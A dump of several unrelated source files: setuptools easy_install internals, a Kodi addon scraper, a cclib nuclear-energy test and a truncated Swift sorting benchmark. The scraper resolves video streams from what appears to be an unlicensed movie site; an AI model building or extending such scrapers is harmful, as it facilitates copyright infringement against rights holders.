from distutils.util import subst_vars
for attr in attrs:
val = getattr(self, attr)
if val is not None:
val = subst_vars(val, config_vars)
if os.name == 'posix':
val = os.path.expanduser(val)
setattr(self, attr, val)
def get_site_dirs():
# return a list of 'site' dirs
sitedirs = [_f for _f in os.environ.get('PYTHONPATH',
'').split(os.pathsep) if _f]
prefixes = [sys.prefix]
if sys.exec_prefix != sys.prefix:
prefixes.append(sys.exec_prefix)
for prefix in prefixes:
if prefix:
if sys.platform in ('os2emx', 'riscos'):
sitedirs.append(os.path.join(prefix, "Lib", "site-packages"))
elif os.sep == '/':
sitedirs.extend([os.path.join(prefix,
"lib",
"python" + sys.version[:3],
"site-packages"),
os.path.join(prefix, "lib", "site-python")])
else:
sitedirs.extend(
[prefix, os.path.join(prefix, "lib", "site-packages")]
)
if sys.platform == 'darwin':
# for framework builds *only* we add the standard Apple
# locations. Currently only per-user, but /Library and
# /Network/Library could be added too
if 'Python.framework' in prefix:
home = os.environ.get('HOME')
if home:
sitedirs.append(
os.path.join(home,
'Library',
'Python',
sys.version[:3],
'site-packages'))
lib_paths = get_path('purelib'), get_path('platlib')
for site_lib in lib_paths:
if site_lib not in sitedirs:
sitedirs.append(site_lib)
if site.ENABLE_USER_SITE:
sitedirs.append(site.USER_SITE)
sitedirs = list(map(normalize_path, sitedirs))
return sitedirs
def expand_paths(inputs):
"""Yield sys.path directories that might contain "old-style" packages"""
seen = {}
for dirname in inputs:
dirname = normalize_path(dirname)
if dirname in seen:
continue
seen[dirname] = 1
if not os.path.isdir(dirname):
continue
files = os.listdir(dirname)
yield dirname, files
for name in files:
if not name.endswith('.pth'):
# We only care about the .pth files
continue
if name in ('easy-install.pth', 'setuptools.pth'):
# Ignore .pth files that we control
continue
# Read the .pth file
f = open(os.path.join(dirname, name))
lines = list(yield_lines(f))
f.close()
# Yield existing non-dupe, non-import directory lines from it
for line in lines:
if not line.startswith("import"):
line = normalize_path(line.rstrip())
if line not in seen:
seen[line] = 1
if not os.path.isdir(line):
continue
yield line, os.listdir(line)
def extract_wininst_cfg(dist_filename):
"""Extract configuration data from a bdist_wininst .exe
Returns a ConfigParser.RawConfigParser, or None
"""
f = open(dist_filename, 'rb')
try:
endrec = zipfile._EndRecData(f)
if endrec is None:
return None
prepended = (endrec[9] - endrec[5]) - endrec[6]
if prepended < 12: # no wininst data here
return None
f.seek(prepended - 12)
from setuptools.compat import StringIO, ConfigParser
import struct
tag, cfglen, bmlen = struct.unpack("<iii", f.read(12))
if tag not in (0x1234567A, 0x1234567B):
return None # not a valid tag
f.seek(prepended - (12 + cfglen))
cfg = ConfigParser.RawConfigParser(
{'version': '', 'target_version': ''})
try:
part = f.read(cfglen)
# part is in bytes, but we need to read up to the first null
# byte.
if sys.version_info >= (2, 6):
null_byte = bytes([0])
else:
null_byte = chr(0)
config = part.split(null_byte, 1)[0]
# Now the config is in bytes, but for RawConfigParser, it should
# be text, so decode it.
config = config.decode(sys.getfilesystemencoding())
cfg.readfp(StringIO(config))
except ConfigParser.Error:
return None
if not cfg.has_section('metadata') or not cfg.has_section('Setup'):
return None
return cfg
finally:
f.close()
def get_exe_prefixes(exe_filename):
"""Get exe->egg path translations for a given .exe file"""
prefixes = [
('PURELIB/', ''), ('PLATLIB/pywin32_system32', ''),
('PLATLIB/', ''),
('SCRIPTS/', 'EGG-INFO/scripts/'),
('DATA/lib/site-packages', ''),
]
z = zipfile.ZipFile(exe_filename)
try:
for info in z.infolist():
name = info.filename
parts = name.split('/')
if len(parts) == 3 and parts[2] == 'PKG-INFO':
if parts[1].endswith('.egg-info'):
prefixes.insert(0, ('/'.join(parts[:2]), 'EGG-INFO/'))
break
if len(parts) != 2 or not name.endswith('.pth'):
continue
if name.endswith('-nspkg.pth'):
continue
if parts[0].upper() in ('PURELIB', 'PLATLIB'):
contents = z.read(name)
if PY3:
contents = contents.decode()
for pth in yield_lines(contents):
pth = pth.strip().replace('\\', '/')
if not pth.startswith('import'):
prefixes.append((('%s/%s/' % (parts[0], pth)), ''))
finally:
z.close()
prefixes = [(x.lower(), y) for x, y in prefixes]
prefixes.sort()
prefixes.reverse()
return prefixes
def parse_requirement_arg(spec):
try:
return Requirement.parse(spec)
except ValueError:
raise DistutilsError(
"Not a URL, existing file, or requirement spec: %r" % (spec,)
)
class PthDistributions(Environment):
"""A .pth file with Distribution paths in it"""
dirty = False
def __init__(self, filename, sitedirs=()):
self.filename = filename
self.sitedirs = list(map(normalize_path, sitedirs))
self.basedir = normalize_path(os.path.dirname(self.filename))
self._load()
Environment.__init__(self, [], None, None)
for path in yield_lines(self.paths):
list(map(self.add, find_distributions(path, True)))
def _load(self):
self.paths = []
saw_import = False
seen = dict.fromkeys(self.sitedirs)
if os.path.isfile(self.filename):
f = open(self.filename, 'rt')
for line in f:
if line.startswith('import'):
saw_import = True
continue
path = line.rstrip()
self.paths.append(path)
if not path.strip() or path.strip().startswith('#'):
continue
# skip non-existent paths, in case somebody deleted a package
# manually, and duplicate paths as well
path = self.paths[-1] = normalize_path(
os.path.join(self.basedir, path)
)
if not os.path.exists(path) or path in seen:
self.paths.pop() # skip it
self.dirty = True # we cleaned up, so we're dirty now :)
continue
seen[path] = 1
f.close()
if self.paths and not saw_import:
self.dirty = True # ensure anything we touch has import wrappers
while self.paths and not self.paths[-1].strip():
self.paths.pop()
def save(self):
"""Write changed .pth file back to disk"""
if not self.dirty:
return
data = '\n'.join(map(self.make_relative, self.paths))
if data:
log.debug("Saving %s", self.filename)
data = (
"import sys; sys.__plen = len(sys.path)\n"
"%s\n"
"import sys; new=sys.path[sys.__plen:];"
" del sys.path[sys.__plen:];"
" p=getattr(sys,'__egginsert',0); sys.path[p:p]=new;"
" sys.__egginsert = p+len(new)\n"
) % data
if os.path.islink(self.filename):
os.unlink(self.filename)
f = open(self.filename, 'wt')
f.write(data)
f.close()
elif os.path.exists(self.filename):
log.debug("Deleting empty %s", self.filename)
os.unlink(self.filename)
self.dirty = False
def add(self, dist):
"""Add `dist` to the distribution map"""
new_path = (
dist.location not in self.paths and (
dist.location not in self.sitedirs or
# account for '.' being in PYTHONPATH
dist.location == os.getcwd()
)
)
if new_path:
self.paths.append(dist.location)
self.dirty = True
Environment.add(self, dist)
def remove(self, dist):
"""Remove `dist` from the distribution map"""
while dist.location in self.paths:
self.paths.remove(dist.location)
self.dirty = True
Environment.remove(self, dist)
def make_relative(self, path):
npath, last = os.path.split(normalize_path(path))
baselen = len(self.basedir)
parts = [last]
sep = os.altsep == '/' and '/' or os.sep
while len(npath) >= baselen:
if npath == self.basedir:
parts.append(os.curdir)
parts.reverse()
return sep.join(parts)
npath, last = os.path.split(npath)
parts.append(last)
else:
return path
def _first_line_re():
"""
Return a regular expression based on first_line_re suitable for matching
strings.
"""
if isinstance(first_line_re.pattern, str):
return first_line_re
# first_line_re in Python >=3.1.4 and >=3.2.1 is a bytes pattern.
return re.compile(first_line_re.pattern.decode())
def auto_chmod(func, arg, exc):
if func is os.remove and os.name == 'nt':
chmod(arg, stat.S_IWRITE)
return func(arg)
et, ev, _ = sys.exc_info()
reraise(et, (ev[0], ev[1] + (" %s %s" % (func, arg))))
def update_dist_caches(dist_path, fix_zipimporter_caches):
"""
Fix any globally cached `dist_path` related data
`dist_path` should be a path of a newly installed egg distribution (zipped
or unzipped).
sys.path_importer_cache contains finder objects that have been cached when
importing data from the original distribution. Any such finders need to be
cleared since the replacement distribution might be packaged differently,
e.g. a zipped egg distribution might get replaced with an unzipped egg
folder or vice versa. Having the old finders cached may then cause Python
to attempt loading modules from the replacement distribution using an
incorrect loader.
zipimport.zipimporter objects are Python loaders charged with importing
data packaged inside zip archives. If stale loaders referencing the
original distribution, are left behind, they can fail to load modules from
the replacement distribution. E.g. if an old zipimport.zipimporter instance
is used to load data from a new zipped egg archive, it may cause the
operation to attempt to locate the requested data in the wrong location -
one indicated by the original distribution's zip archive directory
information. Such an operation may then fail outright, e.g. report having
read a 'bad local file header', or even worse, it may fail silently &
return invalid data.
zipimport._zip_directory_cache contains cached zip archive directory
information for all existing zipimport.zipimporter instances and all such
instances connected to the same archive share the same cached directory
information.
If asked, and the underlying Python implementation allows it, we can fix
all existing zipimport.zipimporter instances instead of having to track
them down and remove them one by one, by updating their shared cached zip
archive directory information. This, of course, assumes that the
replacement distribution is packaged as a zipped egg.
If not asked to fix existing zipimport.zipimporter instances, we still do
our best to clear any remaining zipimport.zipimporter related cached data
that might somehow later get used when attempting to load data from the new
distribution and thus cause such load operations to fail. Note that when
tracking down such remaining stale data, we can not catch every conceivable
usage from here, and we clear only those that we know of and have found to
cause problems if left alive. Any remaining caches should be updated by
whomever is in charge of maintaining them, i.e. they should be ready to
handle us replacing their zip archives with new distributions at runtime.
"""
# There are several other known sources of stale zipimport.zipimporter
# instances that we do not clear here, but might if ever given a reason to
# do so:
# * Global setuptools pkg_resources.working_set (a.k.a. 'master working
# set') may contain distributions which may in turn contain their
# zipimport.zipimporter loaders.
# * Several zipimport.zipimporter loaders held by local variables further
# up the function call stack when running the setuptools installation.
# * Already loaded modules may have their __loader__ attribute set to the
# exact loader instance used when importing them. Python 3.4 docs state
# that this information is intended mostly for introspection and so is
# not expected to cause us problems.
normalized_path = normalize_path(dist_path)
_uncache(normalized_path, sys.path_importer_cache)
if fix_zipimporter_caches:
_replace_zip_directory_cache_data(normalized_path)
else:
# Here, even though we do not want to fix existing and now stale
# zipimporter cache information, we still want to remove it. Related to
# Python's zip archive directory information cache, we clear each of
# its stale entries in two phases:
# 1. Clear the entry so attempting to access zip archive information
# via any existing stale zipimport.zipimporter instances fails.
# 2. Remove the entry from the cache so any newly constructed
# zipimport.zipimporter instances do not end up using old stale
# zip archive directory information.
# This whole stale data removal step does not seem strictly necessary,
# but has been left in because it was done before we started replacing
# the zip archive directory information cache content if possible, and
# there are no relevant unit tests that we can depend on to tell us if
# this is really needed.
_remove_and_clear_zip_directory_cache_data(normalized_path)
def _collect_zipimporter_cache_entries(normalized_path, cache):
"""
Return zipimporter cache entry keys related to a given normalized path.
Alternative path spellings (e.g. those using different character case or
those using alternative path separators) related to the same path are
included. Any sub-path entries are included as well, i.e. those
corresponding to zip archives embedded in other zip archives.
"""
result = []
prefix_len = len(normalized_path)
for p in cache:
np = normalize_path(p)
if (np.startswith(normalized_path) and
np[prefix_len:prefix_len + 1] in (os.sep, '')):
result.append(p)
return result
def _update_zipimporter_cache(normalized_path, cache, updater=None):
"""
Update zipimporter cache data for a given normalized path.
Any sub-path entries are processed as well, i.e. those corresponding to zip
archives embedded in other zip archives.
Given updater is a callable taking a cache entry key and the original entry
(after already removing the entry from the cache), and expected to update
the entry and possibly return a new one to be inserted in its place.
Returning None indicates that the entry should not be replaced with a new
one. If no updater is given, the cache entries are simply removed without
any additional processing, the same as if the updater simply returned None.
"""
for p in _collect_zipimporter_cache_entries(normalized_path, cache):
# N.B. pypy's custom zipimport._zip_directory_cache implementation does
# not support the complete dict interface:
# * Does not support item assignment, thus not allowing this function
# to be used only for removing existing cache entries.
# * Does not support the dict.pop() method, forcing us to use the
# get/del patterns instead. For more detailed information see the
# following links:
# https://bitbucket.org/pypa/setuptools/issue/202/more-robust-zipimporter-cache-invalidation#comment-10495960
# https://bitbucket.org/pypy/pypy/src/dd07756a34a41f674c0cacfbc8ae1d4cc9ea2ae4/pypy/module/zipimport/interp_zipimport.py#cl-99
old_entry = cache[p]
del cache[p]
new_entry = updater and updater(p, old_entry)
if new_entry is not None:
cache[p] = new_entry
def _uncache(normalized_path, cache):
_update_zipimporter_cache(normalized_path, cache)
def _remove_and_clear_zip_directory_cache_data(normalized_path):
def clear_and_remove_cached_zip_archive_directory_data(path, old_entry):
old_entry.clear()
_update_zipimporter_cache(
normalized_path, zipimport._zip_directory_cache,
updater=clear_and_remove_cached_zip_archive_directory_data)
# PyPy Python implementation does not allow directly writing to the
# zipimport._zip_directory_cache and so prevents us from attempting to correct
# its content. The best we can do there is clear the problematic cache content
# and have PyPy repopulate it as needed. The downside is that if there are any
# stale zipimport.zipimporter instances laying around, attempting to use them
# will fail due to not having its zip archive directory information available
# instead of being automatically corrected to use the new correct zip archive
# directory information.
if '__pypy__' in sys.builtin_module_names:
_replace_zip_directory_cache_data = \
_remove_and_clear_zip_directory_cache_data
else:
def _replace_zip_directory_cache_data(normalized_path):
def replace_cached_zip_archive_directory_data(path, old_entry):
# N.B. In theory, we could load the zip directory information just
# once for all updated path spellings, and then copy it locally and
# update its contained path strings to contain the correct
# spelling, but that seems like a way too invasive move (this cache
# structure is not officially documented anywhere and could in
# theory change with new Python releases) for no significant
# benefit.
old_entry.clear()
zipimport.zipimporter(path)
old_entry.update(zipimport._zip_directory_cache[path])
return old_entry
_update_zipimporter_cache(
normalized_path, zipimport._zip_directory_cache,
updater=replace_cached_zip_archive_directory_data)
def is_python(text, filename='<string>'):
"Is this string a valid Python script?"
try:
compile(text, filename, 'exec')
except (SyntaxError, TypeError):
return False
else:
return True
def is_sh(executable):
"""Determine if the specified executable is a .sh (contains a #! line)"""
try:
fp = open(executable)
magic = fp.read(2)
fp.close()
except (OSError, IOError):
return executable
return magic == '#!'
def nt_quote_arg(arg):
"""Quote a command line argument according to Windows parsing rules"""
return subprocess.list2cmdline([arg])
def is_python_script(script_text, filename):
"""Is this text, as a whole, a Python script? (as opposed to shell/bat/etc.
"""
if filename.endswith('.py') or filename.endswith('.pyw'):
return True # extension says it's Python
if is_python(script_text, filename):
return True # it's syntactically valid Python
if script_text.startswith('#!'):
# It begins with a '#!' line, so check if 'python' is in it somewhere
return 'python' in script_text.splitlines()[0].lower()
return False # Not any Python I can recognize
try:
from os import chmod as _chmod
except ImportError:
# Jython compatibility
def _chmod(*args):
pass
def chmod(path, mode):
log.debug("changing mode of %s to %o", path, mode)
try:
_chmod(path, mode)
except os.error as e:
log.debug("chmod failed: %s", e)
def fix_jython_executable(executable, options):
if sys.platform.startswith('java') and is_sh(executable):
# Workaround for Jython is not needed on Linux systems.
import java
if java.lang.System.getProperty("os.name") == "Linux":
return executable
# Workaround Jython's sys.executable being a .sh (an invalid
# shebang line interpreter)
if options:
# Can't apply the workaround, leave it broken
log.warn(
"WARNING: Unable to adapt shebang line for Jython,"
" the following script is NOT executable\n"
" see http://bugs.jython.org/issue1112 for"
" more information.")
else:
return '/usr/bin/env %s' % executable
return executable
class CommandSpec(list):
"""
A command spec for a #! header, specified as a list of arguments akin to
those passed to Popen.
"""
options = []
@classmethod
def _sys_executable(cls):
_default = os.path.normpath(sys.executable)
return os.environ.get('__PYVENV_LAUNCHER__', _default)
@classmethod
def from_param(cls, param):
"""
Construct a CommandSpec from a parameter to build_scripts, which may
be None.
"""
if isinstance(param, cls):
return param
if isinstance(param, list):
return cls(param)
if param is None:
return cls.from_environment()
# otherwise, assume it's a string.
return cls.from_string(param)
@classmethod
def from_environment(cls):
return cls.from_string('"' + cls._sys_executable() + '"')
@classmethod
def from_string(cls, string):
"""
Construct a command spec from a simple string representing a command
line parseable by shlex.split.
"""
items = shlex.split(string)
return JythonCommandSpec.from_string(string) or cls(items)
def install_options(self, script_text):
self.options = shlex.split(self._extract_options(script_text))
cmdline = subprocess.list2cmdline(self)
if not isascii(cmdline):
self.options[:0] = ['-x']
@staticmethod
def _extract_options(orig_script):
"""
Extract any options from the first line of the script.
"""
first = (orig_script + '\n').splitlines()[0]
match = _first_line_re().match(first)
options = match.group(1) or '' if match else ''
return options.strip()
def as_header(self):
return self._render(self + list(self.options))
@staticmethod
def _render(items):
cmdline = subprocess.list2cmdline(items)
return '#!' + cmdline + '\n'
# For pbr compat; will be removed in a future version.
sys_executable = CommandSpec._sys_executable()
class JythonCommandSpec(CommandSpec):
@classmethod
def from_string(cls, string):
"""
On Jython, construct an instance of this class.
On platforms other than Jython, return None.
"""
needs_jython_spec = (
sys.platform.startswith('java')
and
__import__('java').lang.System.getProperty('os.name') != 'Linux'
)
return cls([string]) if needs_jython_spec else None
def as_header(self):
"""
Workaround Jython's sys.executable being a .sh (an invalid
shebang line interpreter)
"""
if not is_sh(self[0]):
return super(JythonCommandSpec, self).as_header()
if self.options:
# Can't apply the workaround, leave it broken
log.warn(
"WARNING: Unable to adapt shebang line for Jython,"
" the following script is NOT executable\n"
" see http://bugs.jython.org/issue1112 for"
" more information.")
return super(JythonCommandSpec, self).as_header()
items = ['/usr/bin/env'] + self + list(self.options)
return self._render(items)
class ScriptWriter(object):
"""
Encapsulates behavior around writing entry point scripts for console and
gui apps.
"""
template = textwrap.dedent("""
# EASY-INSTALL-ENTRY-SCRIPT: %(spec)r,%(group)r,%(name)r
__requires__ = %(spec)r
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.exit(
load_entry_point(%(spec)r, %(group)r, %(name)r)()
)
""").lstrip()
@classmethod
def get_script_args(cls, dist, executable=None, wininst=False):
# for backward compatibility
warnings.warn("Use get_args", DeprecationWarning)
writer = (WindowsScriptWriter if wininst else ScriptWriter).best()
header = cls.get_script_header("", executable, wininst)
return writer.get_args(dist, header)
@classmethod
def get_script_header(cls, script_text, executable=None, wininst=False):
# for backward compatibility
warnings.warn("Use get_header", DeprecationWarning)
if wininst:
executable = "python.exe"
cmd = CommandSpec.from_param(executable)
cmd.install_options(script_text)
return cmd.as_header()
@classmethod
def get_args(cls, dist, header=None):
"""
Yield write_script() argument tuples for a distribution's entrypoints
"""
if header is None:
header = cls.get_header()
spec = str(dist.as_requirement())
for type_ in 'console', 'gui':
group = type_ + '_scripts'
for name, ep in dist.get_entry_map(group).items():
script_text = cls.template % locals()
for res in cls._get_script_args(type_, name, header,
script_text):
yield res
@classmethod
def get_writer(cls, force_windows):
# for backward compatibility
warnings.warn("Use best", DeprecationWarning)
return WindowsScriptWriter.best() if force_windows else cls.best()
@classmethod
def best(cls):
"""
Select the best ScriptWriter for this environment.
"""
return WindowsScriptWriter.best() if sys.platform == 'win32' else cls
@classmethod
def _get_script_args(cls, type_, name, header, script_text):
# Simply write the stub with no extension.
yield (name, header + script_text)
@classmethod
def get_header(cls, script_text="", executable=None):
"""Create a #! line, getting options (if any) from script_text"""
cmd = CommandSpec.from_param(executable)
cmd.install_options(script_text)
return cmd.as_header()
class WindowsScriptWriter(ScriptWriter):
@classmethod
def get_writer(cls):
# for backward compatibility
warnings.warn("Use best", DeprecationWarning)
return cls.best()
@classmethod
def best(cls):
"""
Select the best ScriptWriter suitable for Windows
"""
writer_lookup = dict(
executable=WindowsExecutableLauncherWriter,
natural=cls,
)
# for compatibility, use the executable launcher by default
launcher = os.environ.get('SETUPTOOLS_LAUNCHER', 'executable')
return writer_lookup[launcher]
@classmethod
def _get_script_args(cls, type_, name, header, script_text):
"For Windows, add a .py extension"
ext = dict(console='.pya', gui='.pyw')[type_]
if ext not in os.environ['PATHEXT'].lower().split(';'):
warnings.warn("%s not listed in PATHEXT; scripts will not be "
"recognized as executables." % ext, UserWarning)
old = ['.pya', '.py', '-script.py', '.pyc', '.pyo', '.pyw', '.exe']
old.remove(ext)
header = cls._adjust_header(type_, header)
blockers = [name + x for x in old]
yield name + ext, header + script_text, 't', blockers
@staticmethod
def _adjust_header(type_, orig_header):
"""
Make sure 'pythonw' is used for gui and and 'python' is used for
console (regardless of what sys.executable is).
"""
pattern = 'pythonw.exe'
repl = 'python.exe'
if type_ == 'gui':
pattern, repl = repl, pattern
pattern_ob = re.compile(re.escape(pattern), re.IGNORECASE)
new_header = pattern_ob.sub(string=orig_header, repl=repl)
clean_header = new_header[2:-1].strip('"')
if sys.platform == 'win32' and not os.path.exists(clean_header):
# the adjusted version doesn't exist, so return the original
return orig_header
return new_header
class WindowsExecutableLauncherWriter(WindowsScriptWriter):
@classmethod
def _get_script_args(cls, type_, name, header, script_text):
"""
For Windows, add a .py extension and an .exe launcher
"""
if type_ == 'gui':
launcher_type = 'gui'
ext = '-script.pyw'
old = ['.pyw']
else:
launcher_type = 'cli'
ext = '-script.py'
old = ['.py', '.pyc', '.pyo']
hdr = cls._adjust_header(type_, header)
blockers = [name + x for x in old]
yield (name + ext, hdr + script_text, 't', blockers)
yield (
name + '.exe', get_win_launcher(launcher_type),
'b' # write in binary mode
)
if not is_64bit():
# install a manifest for the launcher to prevent Windows
# from detecting it as an installer (which it will for
# launchers like easy_install.exe). Consider only
# adding a manifest for launchers detected as installers.
# See Distribute #143 for details.
m_name = name + '.exe.manifest'
yield (m_name, load_launcher_manifest(name), 't')
# for backward-compatibility
get_script_args = ScriptWriter.get_script_args
get_script_header = ScriptWriter.get_script_header
def get_win_launcher(type):
"""
Load the Windows launcher (executable) suitable for launching a script.
`type` should be either 'cli' or 'gui'
Returns the executable as a byte string.
"""
launcher_fn = '%s.exe' % type
if platform.machine().lower() == 'arm':
launcher_fn = launcher_fn.replace(".", "-arm.")
if is_64bit():
launcher_fn = launcher_fn.replace(".", "-64.")
else:
launcher_fn = launcher_fn.replace(".", "-32.")
return resource_string('setuptools', launcher_fn)
def load_launcher_manifest(name):
manifest = pkg_resources.resource_string(__name__, 'launcher manifest.xml')
if PY2:
return manifest % vars()
else:
return manifest.decode('utf-8') % vars()
def rmtree(path, ignore_errors=False, onerror=auto_chmod):
"""Recursively delete a directory tree.
This code is taken from the Python 2.4 version of 'shutil', because
the 2.3 version doesn't really work right.
"""
if ignore_errors:
def onerror(*args):
pass
elif onerror is None:
def onerror(*args):
raise
names = []
try:
names = os.listdir(path)
except os.error:
onerror(os.listdir, path, sys.exc_info())
for name in names:
fullname = os.path.join(path, name)
try:
mode = os.lstat(fullname).st_mode
except os.error:
mode = 0
if stat.S_ISDIR(mode):
rmtree(fullname, ignore_errors, onerror)
else:
try:
os.remove(fullname)
except os.error:
onerror(os.remove, fullname, sys.exc_info())
try:
os.rmdir(path)
except os.error:
onerror(os.rmdir, path, sys.exc_info())
def current_umask():
tmp = os.umask(0o022)
os.umask(tmp)
return tmp
def bootstrap():
# This function is called when setuptools*.egg is run using /bin/sh
import setuptools
argv0 = os.path.dirname(setuptools.__path__[0])
sys.argv[0] = argv0
sys.argv.append(argv0)
main()
def main(argv=None, **kw):
from setuptools import setup
from setuptools.dist import Distribution
class DistributionWithoutHelpCommands(Distribution):
common_usage = ""
def _show_help(self, *args, **kw):
with _patch_usage():
Distribution._show_help(self, *args, **kw)
if argv is None:
argv = sys.argv[1:]
with _patch_usage():
setup(
script_args=['-q', 'easy_install', '-v'] + argv,
script_name=sys.argv[0] or 'easy_install',
distclass=DistributionWithoutHelpCommands, **kw
)
@contextlib.contextmanager
def _patch_usage():
import distutils.core
USAGE = textwrap.dedent("""
usage: %(script)s [options] requirement_or_url ...
or: %(script)s --help
""").lstrip()
def gen_usage(script_name):
return USAGE % dict(
script=os.path.basename(script_name),
)
saved = distutils.core.gen_usage
distutils.core.gen_usage = gen_usage
try:
yield
finally:
distutils.core.gen_usage = saved | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import re,traceback,urllib,urlparse,json,base64,time
from resources.lib.modules import cleantitle
from resources.lib.modules import dom_parser2
from resources.lib.modules import client
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['movieshd.tv', 'movieshd.is', 'movieshd.watch', 'flixanity.is', 'flixanity.me','istream.is','flixanity.online','flixanity.cc','123movies.it']
self.base_link = 'http://123movieser.com'
self.search_link = '/watch/%s-%s-online-free-123movies.html'
def movie(self, imdb, title, localtitle, aliases, year):
try:
clean_title = cleantitle.geturl(title)
url = urlparse.urljoin(self.base_link, (self.search_link %(clean_title,year)))
return url
except:
failure = traceback.format_exc()
log_utils.log('Flixanity - Exception: \n' + str(failure))
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
aliases.append({'country': 'us', 'title': tvshowtitle})
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year, 'aliases': aliases}
url = urllib.urlencode(url)
return url
except:
failure = traceback.format_exc()
log_utils.log('Flixanity - Exception: \n' + str(failure))
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
clean_title = cleantitle.geturl(url['tvshowtitle'])+'-s%02d' % int(season)
url = urlparse.urljoin(self.base_link, (self.search_link %(clean_title,url['year'])))
r = client.request(url)
r = dom_parser2.parse_dom(r, 'div', {'id': 'ip_episode'})
r = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in r if i]
for i in r[0]:
if i.content == 'Episode %s'%episode:
url = i.attrs['href']
return url
except:
failure = traceback.format_exc()
log_utils.log('Flixanity - Exception: \n' + str(failure))
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
r = client.request(url)
quality = re.findall(">(\w+)<\/p",r)
if quality[0] == "HD":
quality = "720p"
else:
quality = "SD"
r = dom_parser2.parse_dom(r, 'div', {'id': 'servers-list'})
r = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in r if i]
for i in r[0]:
url = {'url': i.attrs['href'], 'data-film': i.attrs['data-film'], 'data-server': i.attrs['data-server'], 'data-name' : i.attrs['data-name']}
url = urllib.urlencode(url)
sources.append({'source': i.content, 'quality': quality, 'language': 'en', 'url': url, 'direct': False, 'debridonly': False})
return sources
except:
failure = traceback.format_exc()
log_utils.log('Flixanity - Exception: \n' + str(failure))
return
def resolve(self, url):
try:
urldata = urlparse.parse_qs(url)
urldata = dict((i, urldata[i][0]) for i in urldata)
post = {'ipplugins': 1,'ip_film': urldata['data-film'], 'ip_server': urldata['data-server'], 'ip_name': urldata['data-name'],'fix': "0"}
p1 = client.request('http://123movieser.com/ip.file/swf/plugins/ipplugins.php', post=post, referer=urldata['url'], XHR=True)
p1 = json.loads(p1)
p2 = client.request('http://123movieser.com/ip.file/swf/ipplayer/ipplayer.php?u=%s&s=%s&n=0' %(p1['s'],urldata['data-server']))
p2 = json.loads(p2)
p3 = client.request('http://123movieser.com/ip.file/swf/ipplayer/api.php?hash=%s' %(p2['hash']))
p3 = json.loads(p3)
n = p3['status']
if n == False:
p2 = client.request('http://123movieser.com/ip.file/swf/ipplayer/ipplayer.php?u=%s&s=%s&n=1' %(p1['s'],urldata['data-server']))
p2 = json.loads(p2)
url = "https:%s" %p2["data"].replace("\/","/")
return url
except:
failure = traceback.format_exc()
log_utils.log('Flixanity - Exception: \n' + str(failure))
return | unknown | codeparrot/codeparrot-clean | ||
# This file is part of cclib (http://cclib.github.io), a library for parsing
# and interpreting the results of computational chemistry packages.
#
# Copyright (C) 2014,2015, the cclib development team
#
# The library is free software, distributed under the terms of
# the GNU Lesser General Public version 2.1 or later. You should have
# received a copy of the license along with cclib. You can also access
# the full license online at http://www.gnu.org/copyleft/lgpl.html.
"""Test the Nuclear method in cclib"""
from __future__ import print_function
import os
import re
import logging
import unittest
import numpy
from testall import getfile
from cclib.method import Nuclear
from cclib.parser import QChem
from cclib.parser import utils
class NuclearTest(unittest.TestCase):
def test_nre(self):
"""Testing nuclear repulsion energy for one logfile where it is printed."""
data, logfile = getfile(QChem, "basicQChem4.2", "water_mp4sdq.out")
nuclear = Nuclear(data)
nuclear.logger.setLevel(logging.ERROR)
with open(logfile.filename) as f:
output = f.read()
line = re.search('Nuclear Repulsion Energy = .* hartrees', output).group()
nre = float(line.split()[4])
nre = utils.convertor(nre, 'Angstrom', 'bohr')
self.assertAlmostEqual(nuclear.repulsion_energy(), nre, places=7)
tests = [NuclearTest]
if __name__ == "__main__":
unittest.TextTestRunner(verbosity=2).run(unittest.makeSuite(NuclearTest)) | unknown | codeparrot/codeparrot-clean | ||
import TestsUtils
// This benchmark aims to measure heapSort path of stdlib sorting function.
// Datasets in this benchmark are influenced by stdlib partition function,
// therefore if stdlib partition implementation changes we should correct these
// datasets or disable/skip this benchmark
public let benchmarks = [
BenchmarkInfo(
name: "SortIntPyramid",
runFunction: run_SortIntPyramid,
tags: [.validation, .api, .algorithm],
legacyFactor: 5),
BenchmarkInfo(
name: "SortAdjacentIntPyramids",
runFunction: run_SortAdjacentIntPyramids,
tags: [.validation, .api, .algorithm],
legacyFactor: 5),
]
// let A - array sorted in ascending order,
// A^R - reversed array A, + - array concatenation operator
// A indices are in range 1...A.length
// define the pyramid as A + A^R
// define pyramid height as A[A.length]
// On 92% of following dataset stdlib sorting function will use heapSort.
// number of ranges sorted by heapSort: 26
// median heapSort range length: 198
// maximum -||-: 1774
// average -||-: 357
// pyramid height
let pH = 5000
let pyramidTemplate: [Int] = (1...pH) + (1...pH).reversed()
// let A - array sorted in ascending order,
// A^R - reversed array A, + - array concatenation operator,
// A indices are in range 1...A.length.
// define adjacent pyramid as A + A^R + A + A^R,
// define adjacent pyramid height as A[A.length].
// On 25% of following dataset stdlib sorting function will use heapSort.
// number of ranges sorted by heapSort: 71
// median heapSort range length: 28
// maximum -||-: 120
// average -||-: 36
// adjacent pyramids height.
let aPH = pH / 2
let adjacentPyramidsTemplate: [Int] = (1...aPH) + (1...aPH).reversed()
+ (1...aPH) + (1...aPH).reversed()
@inline(never)
public func run_SortIntPyramid(_ n: Int) {
for _ in 1...5*n {
var pyramid = pyramidTemplate
// sort pyramid in place.
pyramid.sort()
// Check whether pyramid is sorted.
check(pyramid[0] <= pyramid[pyramid.count/2])
}
}
@inline(never)
public func run_SortAdjacentIntPyramids(_ n: Int) {
for _ in 1...5*n {
